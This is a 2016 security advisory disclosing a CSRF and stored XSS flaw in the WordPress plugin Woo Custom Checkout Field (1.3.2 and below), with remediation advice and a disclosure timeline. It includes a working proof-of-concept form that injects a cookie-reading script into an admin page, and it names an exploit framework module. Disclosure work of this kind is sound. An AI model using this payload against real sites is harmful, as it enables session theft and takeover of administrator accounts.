Woo Custom Checkout Field <= 1.3.2 CSRF + Stored XSS Disclosure

Datetime:2016-08-22 21:55:20          Topic: XSS Vulnerability           Share

Homepage

https://wordpress.org/plugins/woo-custom-checkout-field/

Overview

Due to a lack of CSRF mitigation and entity encoding in the ccf_insert function found on line 118 of include/ccf.php and in the output generated by template/datagrid.php , it is possible to store and execute scripts in the context of an admin user.

CVSS Score

5.2

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:W/RC:C)

Versions Affected

1.3.2 and below

Solution

No official solution has been published by the vendor, nor have they acknowledged the issue at hand.

A simple and temporary work around for the XSS vulnerability is to wrap all data output in the template/datagrid.php file in calls to htmlentities (see http://php.net/manual/en/function.htmlentities.php for usage).

To fix the CSRF vulnerability, one will need to implement a nonce into the ccf_insert function, see https://codex.wordpress.org/WordPress_Nonces for examples of how to do this.

Proof of Concept

<form method="post" action="http://[target]/wp-admin/admin.php?page=ccf_settings_menu">  
    <input type="text" name="txt_field_name" value="field_name">
    <input type="text" name="txt_field_class" value="<script>alert(document.cookie);</script>">
    <input type="text" name="txt_field_placeholder" value="placeholder">
    <input type="text" name="txt_field_type" value="text">
    <input type="text" name="txt_field_options" value="">
    <input type="submit" name="add_field" value="Submit">
</form>

WordPress Exploit Framework Module

exploits/woo_custom_checkout_field_xss_shell_upload

WPVDB-ID

Pending

Disclosure Timeline

  • 2016-07-23 : Identified vulnerability, contacted vendor with POC and advice on how to resolve the issue.
  • 2016-07-25 : No response from vendor, contacting WordPress to report issue.
  • 2016-07-26 : Public disclosure




About List